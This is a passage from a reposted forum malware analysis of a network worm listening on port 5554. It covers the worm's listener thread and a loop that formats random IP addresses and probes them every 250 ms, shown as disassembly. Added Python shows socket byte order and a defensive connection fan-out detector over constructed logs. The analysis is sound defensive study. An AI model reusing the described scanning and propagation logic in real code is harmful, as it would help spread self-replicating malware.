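    htons(0x15B2) is stored as the bytes 15 B2, which reads back as 0xB215."""
    return struct.unpack("<H", struct.pack("!H", port))[0]


def listener_roundtrip(backlog: int = 5) -> dict:
    """socket(2,1,0) / bind / listen(5) / accept, as in the thread function,
    but on loopback with port 0 so the OS picks a free port. A client connects
    first so that accept, which would otherwise block like the debugger shows,
    returns immediately. Returns what the server side observed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    srv.bind(("127.0.0.1", 0))
    srv.listen(backlog)
    port = srv.getsockname()[1]
    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        cli.connect(("127.0.0.1", port))       # handshake completes in the kernel
        conn, peer = srv.accept()              # accept returns the queued connection
        try:
            cli.sendall(b"USER anonymous\r\n")   # constructed client line
            return {"port": port, "peer": peer[0], "received": conn.recv(64)}
        finally:
            conn.close()
    finally:
        cli.close()
        srv.close()


if __name__ == "__main__":
    raw = build_sockaddr_in(WORM_PORT)
    print(raw.hex(), parse_sockaddr_in(raw), hex(port_as_stored(WORM_PORT)))
    print(listener_roundtrip())
```

Reading the dump at pSockAddr, the WORD at offset 2 shows as B215 in a little-endian dump view because htons swapped it; the port is still 5554. On a defended host, a process that is not an FTP server yet listens on 5554 with a backlog of 5 is exactly what the host audit earlier looks for.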

00401ED8  |. 8D4D FC         |LEA ECX, DWORD PTR SS:[EBP-4]
00401EDB  |. 51              |PUSH ECX                          ; /pThreadId
00401EDC  |. 56              |PUSH ESI                          ; |CreationFlags
00401EDD  |. 50              |PUSH EAX                          ; |pThreadParm (the accepted socket)
00401EDE  |. 68 031B4000     |PUSH dumped_.00401B03             ; |ThreadFunction = dumped_.00401B03
00401EE3  |. 56              |PUSH ESI                          ; |StackSize
00401EE4  |. 56              |PUSH ESI                          ; |pSecurity
00401EE5  |. FF15 38504000   |CALL DWORD PTR DS:[<&kernel32.CreateThread>] ; \CreateThread
00401EEB  |. 6A 19           |PUSH 19                           ; /Timeout = 25. ms
00401EED  |. FF15 1C504000   |CALL DWORD PTR DS:[<&kernel32.Sleep>] ; \Sleep
00401EF3  \.^EB DA           \JMP SHORT dumped_.00401ECF

00401EF5   . 83EC 54         SUB ESP, 54
00401EF8   . 53              PUSH EBX
00401EF9   . 55              PUSH EBP
00401EFA   . 8B2D DC504000   MOV EBP, DWORD PTR DS:[<&user32.wsprintfA>] ; user32.wsprintfA

Part omitted here.

00401FBB   . 8BCE            MOV ECX, ESI
00401FBD   . F7F9            IDIV ECX
00401FBF   . 52              PUSH EDX
00401FC0   > 8D4424 20       LEA EAX, DWORD PTR SS:[ESP+20]
00401FC4   . 68 4C6A4000     PUSH dumped_.00406A4C              ; ASCII "%i.%i.%i.%i"

An IP address format, see!

00401FC9   . 50              PUSH EAX
00401FCA   . FFD5            CALL EBP                           ; wsprintfA
00401FCC   . 83C4 18         ADD ESP, 18
00401FCF   . 8D4424 10       LEA EAX, DWORD PTR SS:[ESP+10]
00401FD3   . 50              PUSH EAX
00401FD4   . E8 39FAFFFF     CALL dumped_.00401A12
00401FD9   . 59              POP ECX
00401FDA   . 68 FA000000     PUSH 0FA                           ; /Timeout = 250. ms
00401FDF   . FF15 1C504000   CALL DWORD PTR DS:[<&kernel32.Sleep>] ; \Sleep

And straight away it does the same thing again:

00401FE5   .^E9 1DFFFFFF     JMP dumped_.0040

1F07

--------------------------------------------------------------------------------
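The loop above is what the 128 threads created earlier run: format a remainder from IDIV as "%i.%i.%i.%i", hand the address to 00401A12, sleep 250 ms, repeat. From the network side that looks like one source opening connections to a stream of unrelated addresses, which is the behaviour a defender can alert on without knowing the exploit the write-up leaves unanalyzed. The Python below is an added example, not code from the write-up: a sliding-window fan-out detector run over constructed connection-attempt records (format, field names, window and threshold are this example's own assumptions). The constructed log has one host that behaves like a single scanning thread and one ordinary client.

```python
import random
import re
from collections import defaultdict
from typing import Dict, List, Tuple

WINDOW_SECONDS = 10.0
FANOUT_THRESHOLD = 30   # assum.: an ordinary client rarely reaches 30 distinct peers in 10 s

# Constructed record format: "<unix-ts> <src> -> <dst> SYN"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+)\s+\S+$")


def parse_line(line: str) -> Tuple[float, str, str]:
    """Parse one connection-attempt record into (timestamp, src, dst)."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable record: {line!r}")
    return float(m.group(1)), m.group(2), m.group(3)


def fanout_alerts(lines, window: float = WINDOW_SECONDS,
                  threshold: int = FANOUT_THRESHOLD) -> Dict[str, int]:
    """For every source, find the largest number of distinct destinations it
    contacted inside any `window`-second span; report sources at or above
    `threshold` together with that peak."""
    events = defaultdict(list)            # src -> [(ts, dst)]
    for line in lines:
        ts, src, dst = parse_line(line)
        events[src].append((ts, dst))

    alerts: Dict[str, int] = {}
    for src, evs in events.items():
        evs.sort()
        in_window = defaultdict(int)      # dst -> hits inside the current window
        lo, peak = 0, 0
        for ts, dst in evs:
            in_window[dst] += 1
            while evs[lo][0] < ts - window:   # expire events older than the window
                old = evs[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


def constructed_log(seed: int = 7) -> List[str]:
    """Constructed sample: 10.0.0.5 mimics one scanning thread (a fresh random
    destination every 250 ms for 15 s); 10.0.0.7 talks to three servers."""
    rng = random.Random(seed)
    t0 = 1083801600.0
    lines = []
    for i in range(60):
        dst = "{}.{}.{}.{}".format(*[rng.randint(1, 254) for _ in range(4)])
        lines.append(f"{t0 + i * 0.25:.3f} 10.0.0.5 -> {dst} SYN")
    servers = ["10.0.0.1", "10.0.0.2", "10.0.0.3"]
    for i in range(12):
        lines.append(f"{t0 + i * 1.2:.3f} 10.0.0.7 -> {servers[i % 3]} SYN")
    rng.shuffle(lines)                    # records arrive interleaved
    return lines


if __name__ == "__main__":
    for src, peak in fanout_alerts(constructed_log()).items():
        print(f"ALERT {src}: {peak} distinct destinations within {WINDOW_SECONDS:.0f} s")
```

With 128 such threads the real fan-out is two orders of magnitude higher, so the threshold is not the sensitive part; what matters is keying on distinct destinations per source rather than on total packets, which a busy but legitimate client can also generate.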

At this point the analysis is complete! As for how the virus uses a vulnerability to get a shell, my level is limited and for certain reasons I haven't analyzed it; those who are interested can research it.

Finally, what's here is enough to write up the workings of a program that damages a system! But I take no responsibility for the consequences that follow from it!

I feel a bit embarrassed! But after all it was my first time analyzing a virus, and I'd like to share it with everyone! The virus really is that simple!

Please keep this intact when reposting!

http://bbs.ped.com/showthread.php?s=a0b9f4c265d2aed622acf3c42ac92e9f&threadid=397

When reposting, please cite the original address: https://www.9cbs.com/read-58353.html